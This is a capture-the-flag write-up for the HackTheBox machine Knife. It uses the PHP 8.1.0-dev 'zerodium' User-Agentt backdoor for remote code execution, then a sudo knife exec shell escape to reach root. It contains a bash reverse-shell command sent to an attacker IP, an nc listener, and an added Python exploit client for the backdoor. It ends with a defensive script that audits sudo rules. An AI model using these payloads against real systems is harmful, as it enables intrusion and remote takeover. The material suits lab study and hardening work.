HackTheBox - Knife

HTB Knife


OS: Linux
Difficulty: Easy
IP Address: 10.10.10.242
Status: Retired

Knife was rated an easy machine on HackTheBox, created by MrKN16H7. It serves a webpage on port 80 from a development build of PHP (8.1.0-dev) that carries a backdoor allowing unauthenticated remote code execution. We analyze the backdoor and then use a public proof-of-concept script from PacketStorm to gain a foothold as the user james. Privilege escalation goes through a binary named knife, the command-line tool for managing the infrastructure automation platform Chef, which james is allowed to run as root.

Phase 1 - Enumeration

Nmap

As usual, we start with an Nmap scan to see which ports are open.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open: SSH on 22 and Apache httpd on 80.

Port 80

Opening the webpage shows nothing but a static page.

But when we inspect the response headers in the browser DevTools, the X-Powered-By header reveals the PHP version the server is running: PHP/8.1.0-dev.

Phase 2 - Exploitation

PHP-8.1.0-dev Backdoor (RCE)

A quick search on PHP 8.1.0-dev immediately turns up an unauthenticated remote code execution vulnerability: in March 2021 PHP's git repository was compromised and a backdoor was planted in the 8.1.0-dev branch that evaluates PHP code supplied in a User-Agentt request header. Details and usage can be found here. We also find two proof-of-concept scripts: one by flast101 on ExploitDB and the other by Mayank Deshmukh on PacketStorm.

Analyzing the Exploit

Looking at the exploit script, the vulnerability is simple and straightforward:

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    # the backdoor trigger: the literal "zerodium" followed by the PHP code to evaluate
    "User-Agentt": "zerodiumsystem('" + cmd + "');"
}

As the snippet shows, the trigger is a User-Agentt header (User-Agent with an extra "t"). The backdoored code in ext/zlib looks for the substring zerodium in that header's value and passes everything after it to zend_eval_string(), so a value of zerodiumsystem('id'); executes system('id') on the server and the command output comes back in the response body.

So we can put a Bash reverse shell in that header, start a listener on the chosen port and get a shell as james; or, even simpler, run the PacketStorm script, which does exactly that for us:

┌──(kali㉿kali)-[~/CTF/HTB/machines/knife]
└─$ python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.8/9000 0>&1'"
┌──(kali㉿kali)-[~/CTF/HTB/machines/knife]
└─$ nc -lnvp 9000
listening on [any] 9000 ... 
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.242] 55806 
bash: cannot set terminal process group (933): Inappropriate ioctl for device 
bash: no job control in this shell 
james@knife:/$

And we are in as james!
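The whole trigger end to end, as an added example that is neither the page's code nor the PacketStorm or ExploitDB script: it builds the User-Agentt header, sends it, and checks whether the server evaluated the PHP we supplied. Instead of running a command it asks the backdoor to echo a marker string, a non-destructive way to confirm a host is backdoored before dropping a shell. The _FakePHP server is a constructed stand-in that mimics only the echo case of the real backdoor logic so the example runs offline; the marker value and the target URL are assumptions.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

MARKER = "knife-probe-7f3a"  # assumption: any string unlikely to appear on a normal page


def backdoor_headers(php_code: str) -> dict:
    """Build the trigger header. The backdoored zlib output handler looks for the
    substring 'zerodium' in User-Agentt and evaluates everything after it as PHP."""
    return {"User-Agent": "Mozilla/5.0", "User-Agentt": "zerodium" + php_code}


def run_php(base_url: str, php_code: str, timeout: float = 5.0) -> str:
    """Send one GET carrying php_code in the backdoor header; return the response body."""
    u = urlparse(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request("GET", u.path or "/", headers=backdoor_headers(php_code))
        return conn.getresponse().read().decode("utf-8", errors="replace")
    finally:
        conn.close()


def is_backdoored(base_url: str) -> bool:
    """Harmless check: a backdoored server echoes MARKER, a clean one ignores the header."""
    return MARKER in run_php(base_url, f"echo '{MARKER}';")


def run_command(base_url: str, cmd: str) -> str:
    """What the public PoC scripts do: wrap an OS command in PHP's system()."""
    return run_php(base_url, f"system('{cmd}');")


class _FakePHP(BaseHTTPRequestHandler):
    """Constructed stand-in for a backdoored PHP 8.1.0-dev server (offline testing only).
    It reproduces the 'find zerodium, take the rest' logic for the single case
    echo '<text>'; and never evaluates anything."""

    backdoored = True  # the subclass below flips this to model a clean server

    def do_GET(self):
        page = "<html>Emergent Medical Idea</html>"
        uat = self.headers.get("User-Agentt", "")
        idx = uat.find("zerodium") if self.backdoored else -1
        if idx != -1:
            code = uat[idx + len("zerodium"):]
            if code.startswith("echo '") and code.endswith("';"):
                page = code[len("echo '"):-2] + page
        data = page.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the test output quiet
        pass


class _CleanPHP(_FakePHP):
    backdoored = False


def start_fake_server(backdoored: bool = True):
    """Start the stand-in on a random loopback port; returns (base_url, server)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakePHP if backdoored else _CleanPHP)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_address[1]}/", srv


if __name__ == "__main__":
    url, srv = start_fake_server()
    print("backdoored:", is_backdoored(url))
    srv.shutdown()
```

Against a real target, call is_backdoored("http://10.10.10.242/") first and run_command("http://10.10.10.242/", "id") once it returns True; the command output is returned inline in the response body.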

Phase 3 - Privilege Escalation

Knife from Chef

Chef is an automation/infrastructure platform:

Chef Infra is a powerful automation platform that transforms infrastructure into code. Whether you’re operating in the cloud, on-premises, or in a hybrid environment, Chef Infra automates how infrastructure is configured, deployed, and managed across your network, no matter its size.

And knife is a command line tool to manage Chef.

Listing what james is allowed to run through sudo, we find a single entry:

james@knife:~$ sudo -l
Matching Defaults entries for james on knife: 
	env_reset, mail_badpass, 
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 

User james may run the following commands on knife: 
	(root) NOPASSWD: /usr/bin/knife

So james can run knife as root without a password. GTFOBins has an entry for knife: its exec subcommand evaluates Ruby, and with -E a Ruby string can be passed directly on the command line. Ruby's exec replaces the current process with the named program, so exec '/bin/bash' turns the root-owned knife process into a root shell. A sudo rule on any tool that can evaluate arbitrary code is equivalent to unrestricted root, so the fix is to remove the rule rather than try to restrict its arguments.

james@knife:~$ sudo knife exec -E "exec '/bin/bash'"
root@knife:/home/james#

And we are root!
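As an added example that is not part of the original writeup, the following Python audit parses sudo -l output and flags rules that hand out root through a binary with a documented shell escape, which is exactly the pattern that made this box fall. The SHELL_CAPABLE set is an illustrative subset of GTFOBins entries assumed here, not a complete list, and SAMPLE is the sudo -l output from this box reproduced as constructed input.

```python
import re

# Assumed illustrative subset of binaries GTFOBins documents as able to spawn a
# shell or evaluate arbitrary code when run through sudo (knife via `knife exec`).
SHELL_CAPABLE = {
    "knife", "vim", "vi", "less", "more", "find", "awk",
    "python3", "perl", "ruby", "bash", "sh", "env",
}

# One rule line of `sudo -l`: "(runas) TAG: TAG: /path/cmd args, /other/cmd"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)


def parse_sudo_l(output: str) -> list[dict]:
    """Turn the 'may run the following commands' section of `sudo -l` into
    {runas, nopasswd, command} records. Lines before that section are skipped."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": runas, "nopasswd": nopasswd, "command": cmd})
    return rules


def risky_rules(output: str) -> list[dict]:
    """Rules that reach root through an unrestricted (ALL) command or through a
    binary known to give a shell; each record gains a 'binary' key."""
    risky = []
    for r in parse_sudo_l(output):
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if r["runas"] in ("root", "ALL") and (binary == "ALL" or binary in SHELL_CAPABLE):
            risky.append({**r, "binary": binary})
    return risky


# Constructed input: the sudo -l output captured on Knife, as shown above.
SAMPLE = """Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for r in risky_rules(SAMPLE):
        print(f"risky: {r['command']} as {r['runas']} "
              f"(nopasswd={r['nopasswd']}, shell-capable binary: {r['binary']})")
```

Feeding it the output of sudo -l from a foothold shell gives a quick triage list; the same parser can be pointed at sudoers exports during a hardening review, where a hit on a tool like knife means the rule should go, not be narrowed.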